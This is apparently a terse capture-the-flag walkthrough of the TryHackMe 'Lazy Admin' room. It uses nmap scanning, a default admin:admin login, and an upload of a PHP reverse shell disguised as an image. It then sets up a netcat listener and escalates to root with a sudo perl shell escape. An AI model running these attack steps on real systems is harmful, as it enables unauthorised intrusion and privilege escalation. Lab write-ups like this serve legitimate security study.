----------------                               ------------------
               :::::::::::;| LAZY ADMIN |;::::::::::::

1) FIRST WE HAVE TO ACCES THE TRYHACKME FROM OPENVPN.
2) WE HAVE TO JOIN THE ROOM "LAZY ADMIN".
 
TASK - 1 (RECON)

1. SCAN THE MACHNE.

    namp -Pn <ip>
    nmap -A -T 5 <ip> -vv

"it's a Linux machine".

2. How many ports are open?
ANS: 2 ports (22/SSH, 80/HTTP)

3. What's on port 80?
ANS: Admin login page with "Lazy Admin" title.

----------TASK 1 COMPLETED----------

TASK - 2 (WEB EXPLOIT)

1. CHECK DEFAULT CREDS.

    admin:admin
    "SUCCESS! LAZY ADMIN INDEED!"

2. FIND UPLOAD.

    "Profile page has image upload"
    "Upload .php reverse shell as image!"

----------TASK 2 COMPLETED-----------
 
TASK - 3 (PRIV ESC)

1. GET SHELL.

    nc -lvnp 4444
    "Access /uploads/shell.php"
    "WE'RE www-data!"

2. CHECK SUDO.

    sudo -l
    "Can run /usr/bin/perl as root!"
    sudo perl -e 'exec "/bin/sh";'
    "ROOT SHELL GET!"

FLAGS:
    cat /root/root.txt
    cat /home/lazy/user.txt

-------------------                                                --------------------
             -----------                                    ------------
                  ---------- LAZY ADMIN PWNED ----------
